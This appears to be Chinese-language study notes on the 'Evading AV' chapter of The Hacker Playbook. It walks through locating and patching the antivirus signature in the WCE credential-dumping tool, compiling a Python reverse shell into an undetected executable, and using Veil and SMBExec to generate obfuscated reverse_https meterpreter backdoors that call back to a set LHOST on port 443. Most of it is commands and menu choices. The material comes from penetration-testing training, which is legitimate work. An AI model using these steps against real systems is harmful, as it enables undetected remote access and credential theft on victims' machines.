[The Hacker Playbook] 7.THE QUARTERBACK SNEAK-EVADING AV

1.EVADING AV

1.1 HIDING WCE FROM AV(WINDOWS)

首先下载Evade(https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/),此软件的作用是以指定大小分割文件。例如，一个50K大小的文件，以5K来分割，总共会得到10个文件，前三个文件大小分为为5K，10K，15K，以此类推，最后一个文件大小为50K。

用杀毒软件分别扫描这10个文件，例如当扫到第5个文件时报警，那么就认为杀软的签名命中了第4个文件结束至第5个文件结束位置的字节。接下来可以再次利用Evade对第5个文件进行更细粒度的分割，最终找到特征串。

打开原文件用HxD将特征串修改为其他字母并保存，执行后杀软不再报警。这个例子比较特殊，因为修改的部分没有影响到可行性文件的执行。

1.2 PYTHON

1.2.1 Python Shell

使用python编写回连的shell，并用pyinstalller将其转换为exe文件，用杀软扫描此文件，不报警。

python pyinstaller.py --out=C:\shell\ --noconsole --onefile "C:\shell\shell.py"

1.2.2 Python Keylogger

1.2.3 Veil Example(Kali Linux)

Veil是一种payload生成器，用来绕过杀软工具。

cd /opt/Veil

./Veil.py

下一步选择了MeterHTTPSContained payload

use 20

接下来像在metasploit中一样，配置相应参数

set LHOST 192.168.75.131

set LPORT 443

generate

选择生成payload的方式，这里选择Pyinstaller

1

可执行文件最终保存在/root/veil-output/compiled/folder中

1.2.4 SMBExec(Kali Linux)

SMBExec包含很多不同的功能，这里介绍其从生成一个混淆处理后的meterpreter可执行文件。

cd /opt/smbexec

./smbexec.sh

选择System Access

2

选择创建一个可执行文件，和rc脚本

2

选择windows/meterpreter/reverse_https

2

输入你的本地主机IP和端口号

172.16.139.209

443

执行结束后，会在同目录下生成一个新的文件夹，名称类似于时间戳。在文件夹中会看到backdoor.exe文件，这就是生成的混淆处理后的meterpreter可执行文件。